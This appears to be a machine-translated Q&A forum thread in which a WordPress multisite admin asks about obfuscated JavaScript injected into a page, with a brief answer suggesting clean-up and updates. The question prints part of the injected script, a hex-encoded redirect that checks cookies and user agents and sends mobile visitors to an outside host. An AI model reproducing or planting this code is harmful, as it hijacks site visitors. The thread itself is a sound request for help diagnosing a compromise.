在WP多站点上,一些javascript代码突然出现在其中一个页面中。我们认为客户不是这样做的。当我谷歌搜索代码时,我在pastebin中发现了一些非常相似的内容:https://pastebin.com/rUn6KnKe
它看起来有点像
var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego
此外,我还可以找到其他一些代码如下的网站:
http://pcsarmacardio.com/ http://ddreadymixconcrete.com/photos/
我们可以轻松删除它,因为它在编辑器中,但是有谁知道为什么会发生这种情况以及如何防止它?
答案 0 :(得分:2)
这表明您的wordpress网站已经尝试过黑客攻击。
删除该病毒并获取站点锁定并更新wordpress并执行相同的清除编码。
删除不需要的代码。安全404.php的主题。有适当的重定向..
如果要从用户那里获取数据,请使用wp_nonce_field。